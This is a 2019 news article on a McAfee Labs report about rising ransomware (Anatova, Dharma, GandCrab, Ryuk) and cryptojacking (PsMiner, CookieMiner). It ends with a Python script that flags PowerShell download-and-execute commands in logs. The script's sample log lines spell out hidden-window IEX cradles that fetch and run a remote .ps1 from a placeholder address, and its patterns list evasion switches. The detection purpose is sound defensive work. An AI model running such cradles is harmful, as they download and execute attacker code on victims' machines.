According to a new report released by McAfee Labs, ransomware attacks have grown by 118% this year. New families have been detected, and threat actors have been using new, innovative techniques to evade antivirus and other protection software and appliances.
The McAfee Labs Advanced Threat Research team was the first to discover a new ransomware family, Anatova, which encrypts all files before demanding a ransom payment from its victims. Anatova is unique in that it is modular, which can facilitate future developments in ransomware.
New Ransomware Techniques Uncovered
Included in the 118% increase in ransomware attacks is the discovery of new ransomware families that use new, innovative methods to target and infiltrate victims. According to the report, McAfee researchers observed threat actors using common spear-phishing attacks, but an increasing number of attacks are being deployed via open and exposed RDP and VNC remote access points. In the past, ransomware relied on C&C environments for ransomware delivery and decryption keys. However, most actors now approach victims with ransom notes that include an anonymous email service and a specified ransom to be paid in cryptocurrency. Most threat actors know the majority of their victims will be unfamiliar with cryptocurrency, so they generally include basic instructions and locations to obtain it.
Anatova, named for the ransom note it drops, was detected in a private p2p network by the McAfee ATR team before it had a chance to become a bigger threat. Anatova usually uses the icon of a game or app to trick victims into downloading it. Anatova can adapt quickly using evasion tactics and spreading mechanisms. The ransomware has a manifest to request admin rights and protections against static analysis, which make it difficult to detect. The modular design allows for new embedded functions designed to thwart anti-ransomware protections.
Top Three Ransomware Families in 2019
While the number of unique ransomware families declined in Q4 of 2018, the first quarter of 2019 saw the exact opposite. Several new ransomware families were detected using innovative techniques to target businesses. According to McAfee, the top three ransomware families active in Q1 of 2019 are:
- Dharma: Dharma is a variant of CrySIS that appends various extensions to encrypted files. It has been in operation since 2016, and its authors continually update and release new variants, which are not decryptable.
- GandCrab: Utilizing AES encryption, this variant encrypts files with a “.GDCB” extension. Using the RIG exploit kit, GandCrab drops a file labeled “GandCrab.exe” on the infected system and begins encrypting files.
- Ryuk: Ryuk impeded newspaper printing in the United States during early Q1. Not much is known about Ryuk; however, McAfee hypothesizes that the Ryuk attacks are not necessarily backed by a nation-state, but rather share the characteristics of a cybercrime operation.
Ryuk and GandCrab tend to rely on spear-phishing attacks, whereas Dharma is used in RDP/VNC attacks. New variants of another persistent family, Scarab, have also been detected on a continual basis this year.
Cryptojacking Families and Campaigns
Cryptojacking increased by 29% in 2019. New miner families were detected targeting both Windows and Mac users. These miners were also used to steal wallets and credentials.
One of the most prevalent crypto malware campaigns detected in Q1 was PsMiner. PsMiner is distributed through a Trojan with worm capabilities. It is designed to brute-force its way into vulnerable servers running ElasticSearch, Hadoop, Redis, Spring, SqlServer, ThinkPHP, and Weblogic, and then spread itself from server to server for more efficient mining. Like many other miners targeting Windows, PsMiner is dropped via a PowerShell command that downloads the “WindowsUpdate.ps1” payload.
CookieMiner is another new malware family that targets Apple users. CookieMiner shares code with a past campaign, and its end goal is stealing wallets and credentials. Using Empyre for automation, once deployed, CookieMiner sets about siphoning data from the infected system. It has been observed stealing data from Binance, Bitstamp, Bittrex, Coinbase, MyEtherWallet, and Poloniex. Although it is primarily a credential scraper, CookieMiner’s choice of coin to mine was unique: it mined Koto rather than Monero, the most commonly mined coin among malicious cryptominers because it can be CPU-mined. CookieMiner was implanted as a library in macOS and used to send the stolen coins to the xmrig server.
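As an added example (not code from the McAfee report or from this article), the following Python triage script scores process-creation log lines for the PowerShell download-and-execute pattern described above, so that a remote .ps1 run in memory with evasion switches is flagged while an ordinary download or an admin script that merely shares the file name is not. The sample log lines, the 203.0.113.10 address, and the weights are constructed for the example.

```python
import re

# Signals of the PowerShell download-and-execute cradle the report describes for PsMiner:
# a remote .ps1 fetched and run in one command, usually with evasion switches.
CRADLE_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|\bcurl\b|\bwget\b", re.I)
EXEC_RE = re.compile(r"Invoke-Expression|\biex\b", re.I)
EVASION_RE = re.compile(r"-(?:nop(?:rofile)?|(?:w|win|windowstyle)\s+hidden"
                        r"|(?:ep|exec|executionpolicy)\s+bypass|enc(?:odedcommand)?)\b", re.I)
REMOTE_PS1_RE = re.compile(r"""https?://[^\s'"]+?/([^/\s'"]+\.ps1)""", re.I)

# Constructed Sysmon-style process-creation lines (not taken from the report).
SAMPLE_LOGS = [
    # PsMiner-style dropper: no profile, hidden window, remote .ps1 run in memory
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://203.0.113.10/WindowsUpdate.ps1')\"",
    # Admin script that merely shares the file name: no download, no IEX
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\WindowsUpdate.ps1",
    # Plain download to disk, nothing executed
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell.exe -Command \"Invoke-WebRequest -Uri https://example.com/report.csv -OutFile C:\\Temp\\r.csv\"",
    # Same cradle built from aliases, with a different payload name
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell.exe -ep bypass -c \"iwr http://203.0.113.10/x.ps1 | iex\"",
]

def analyze(line):
    m = re.search(r"CommandLine=(.*)$", line)        # take the command line if the record has one
    cmd = m.group(1) if m else line
    f = {"score": 0, "reasons": [], "payload": None}
    if "powershell" not in cmd.lower():
        return f
    if CRADLE_RE.search(cmd):
        f["score"] += 2; f["reasons"].append("remote download")
    if EXEC_RE.search(cmd):
        f["score"] += 2; f["reasons"].append("in-memory execution (IEX)")
    flags = {x.lower() for x in EVASION_RE.findall(cmd)}   # one point per distinct switch
    if flags:
        f["score"] += len(flags); f["reasons"].append("evasion switches: " + ", ".join(sorted(flags)))
    p = REMOTE_PS1_RE.search(cmd)
    if p:
        f["payload"] = p.group(1); f["score"] += 1; f["reasons"].append("remote .ps1 payload " + p.group(1))
        if p.group(1).lower() == "windowsupdate.ps1":      # payload name reported for PsMiner
            f["score"] += 2; f["reasons"].append("payload name matches PsMiner dropper")
    return f

def scan(lines, threshold=4):   # (index, finding) for each line at or above the threshold
    return [(i, f) for i, f in enumerate(map(analyze, lines)) if f["score"] >= threshold]
```

Run `scan(SAMPLE_LOGS)` to see that only the two cradle lines alert; the `reasons` list gives an analyst the evidence behind each score.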
-N. Coursey, August 30th, 2019